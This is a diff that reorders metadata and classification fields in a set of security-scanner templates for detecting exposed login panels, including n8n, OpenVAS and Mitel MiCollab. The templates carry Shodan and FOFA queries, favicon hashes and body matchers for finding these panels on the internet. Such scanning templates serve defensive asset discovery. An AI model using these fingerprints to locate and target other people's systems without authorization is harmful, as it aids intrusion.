  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"LibrePhotos"
-    product: librephotos
    vendor: librephotos_project
+    product: librephotos
+    shodan-query: title:"LibrePhotos"
  tags: panel,librephotos,detect,login

-  classification:
-    cpe: cpe:2.3:a:librephotos_project:librephotos:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -32,4 +32,5 @@ http:
        status:
          - 200
          - 404
-# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ac7ab2163e3fe81bf44a7f0f39bc5cca173e38c9edf3db89757ed23af103255b02203e835eb224bae8e1950208986e6c298f9d57da2e5de0e1d059af590a46c1971d:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/mitel-micollab-panel.yaml
+++ b/http/exposed-panels/mitel-micollab-panel.yaml
@ -8,16 +8,16 @@ info:
    Mitel MiCollab login panel was detected.
  reference:
    - https://www.mitel.com/products/micollab-miteam-meetings-collaboration-software
+  classification:
+    cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:-:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.html:"MiCollab End User Portal"
-    product: micollab
    vendor: mitel
+    product: micollab
+    shodan-query: http.html:"MiCollab End User Portal"
  tags: panel,mitel,login,detect

-  classification:
-    cpe: cpe:2.3:a:mitel:micollab:*:*:*:*:-:*:*:*
 http:
  - method: GET
    path:
@ -29,4 +29,5 @@ http:
          - 'status_code == 200'
          - 'contains_any(to_lower(body), "micollab", "mitel_logo", "com.mitel.mas.portal.domain")'
        condition: and
-# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220361282e6b1e66774165622e644199d357d79481ff44547955f4ae1bb69edeefa022100a3f72f32ee02767e239bd7ec39baee800d3c3cce8b2eddd75b477ce2d4b92236:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/mobileiron-sentry.yaml
+++ b/http/exposed-panels/mobileiron-sentry.yaml
@ -7,16 +7,16 @@ info:
  description: MobileIron Sentry panel was detected.
  reference:
    - https://help.ivanti.com/mi/help/en_us/sntry/9.9.0/gdcl/Content/SentryGuide/MobileIron_Sentry_overvi.htm
+  classification:
+    cpe: cpe:2.3:a:mobileiron:sentry:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:967636089
-    product: sentry
    vendor: mobileiron
+    product: sentry
+    shodan-query: http.favicon.hash:967636089
  tags: panel,mobileiron

-  classification:
-    cpe: cpe:2.3:a:mobileiron:sentry:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -32,4 +32,5 @@ http:
        group: 1
        regex:
          - \?([\d.]+)"
-# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220450cf4f172df2c9696767fc8673981f62f8f8e00d0ed029ac8159b72651c9b9b02210088874dd29ec9b437e6448216863a7cd7a2c0e91dff0dfa9a0c9e0173ba72975f:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/monitorr-panel.yaml
+++ b/http/exposed-panels/monitorr-panel.yaml
@ -4,17 +4,17 @@ info:
  name: Monitorr Panel - Detect
  author: ritikchaddha
  severity: info
+  classification:
+    cpe: cpe:2.3:a:monitorr:monitorr:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
+    vendor: monitorr
+    product: monitorr
    shodan-query: http.favicon.hash:-211006074
    fofa-query: icon_hash="-211006074"
-    product: monitorr
-    vendor: monitorr
  tags: panel,monitorr,detect

-  classification:
-    cpe: cpe:2.3:a:monitorr:monitorr:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -26,4 +26,5 @@ http:
          - 'status_code == 200'
          - 'contains_any(body, "content=\"Monitorr", "Monitorr is loading", "title=\"Monitorr Settings")'
        condition: and
-# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/moodle-workplace-panel.yaml
+++ b/http/exposed-panels/moodle-workplace-panel.yaml
@ -8,16 +8,16 @@ info:
    Moodle workplace login panel was detected.
  reference:
    - https://moodle.com/solutions/workplace/
+  classification:
+    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.html:"moodle"
-    product: moodle
    vendor: moodle
+    product: moodle
+    shodan-query: http.html:"moodle"
  tags: panel,moodle,login,detect

-  classification:
-    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -29,4 +29,5 @@ http:
          - 'status_code == 200'
          - 'contains_any(body, "content=\"moodle", "\"name\":\"moodle\"") && contains(body, "workplace")'
        condition: and
-# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/n8n-panel.yaml
+++ b/http/exposed-panels/n8n-panel.yaml
@ -8,16 +8,16 @@ info:
    The worlds most popular workflow automation platform for technical teams
  reference:
    - https://n8n.io/
+  classification:
+    cpe: cpe:2.3:a:n8n:n8n:*:*:*:*:node.js:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:-831756631
-    product: n8n
    vendor: n8n
+    product: n8n
+    shodan-query: http.favicon.hash:-831756631
  tags: panel,n8n,login,detect

-  classification:
-    cpe: cpe:2.3:a:n8n:n8n:*:*:*:*:node.js:*:*:*
 http:
  - method: GET
    path:
@ -34,4 +34,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/netflow-analyzer-panel.yaml
+++ b/http/exposed-panels/netflow-analyzer-panel.yaml
@ -4,16 +4,16 @@ info:
  name: Netflow Analyzer Login - Panel
  author: DhiyaneshDk
  severity: info
-  metadata:
-    shodan-query: html:"Login - Netflow Analyzer"
-    verified: true
-    max-request: 1
-    product: manageengine_netflow_analyzer
-    vendor: zohocorp
-  tags: netflow,analyzer,panel,login
-
  classification:
    cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: zohocorp
+    product: manageengine_netflow_analyzer
+    shodan-query: html:"Login - Netflow Analyzer"
+  tags: netflow,analyzer,panel,login
+
 http:
  - raw:
      - |
@ -30,4 +30,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/nocodb-panel.yaml
+++ b/http/exposed-panels/nocodb-panel.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://www.nocodb.com/
    - https://docs.nocodb.com/
+  classification:
+    cpe: cpe:2.3:a:xgenecloud:nocodb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: "http.favicon.hash:206985584"
-    product: nocodb
    vendor: xgenecloud
+    product: nocodb
+    shodan-query: "http.favicon.hash:206985584"
  tags: panel,nocodb,login,detect

-  classification:
-    cpe: cpe:2.3:a:xgenecloud:nocodb:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -26,6 +26,7 @@ http:
      - "{{BaseURL}}/dashboard/favicon.ico"

    stop-at-first-match: true
+
    matchers-condition: or
    matchers:
      - type: word
@ -37,4 +38,5 @@ http:
      - type: dsl
        dsl:
          - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))"
-# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/openedge-panel.yaml
+++ b/http/exposed-panels/openedge-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    An OpenEdge login panel was detected.
-  metadata:
-    shodan-query: html:"Welcome to Progress Application Server for OpenEdge"
-    verified: true
-    max-request: 1
-    product: openedge
-    vendor: progress
-  tags: panel,openedge,login,detect
-
  classification:
    cpe: cpe:2.3:a:progress:openedge:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: progress
+    product: openedge
+    shodan-query: html:"Welcome to Progress Application Server for OpenEdge"
+  tags: panel,openedge,login,detect
+
 http:
  - method: GET
    path:
@ -31,4 +31,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/openvas-panel.yaml
+++ b/http/exposed-panels/openvas-panel.yaml
@ -8,16 +8,16 @@ info:
    An OpenVas Admin login panel was detected.
  reference:
    - https://openvas.org/
+  classification:
+    cpe: cpe:2.3:a:openvas:openvas_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.favicon.hash:1606029165
-    product: openvas_manager
    vendor: openvas
+    product: openvas_manager
+    shodan-query: http.favicon.hash:1606029165
  tags: panel,openvas,admin,login

-  classification:
-    cpe: cpe:2.3:a:openvas:openvas_manager:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -36,4 +36,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950
--- a/Show More
+++ b/Show More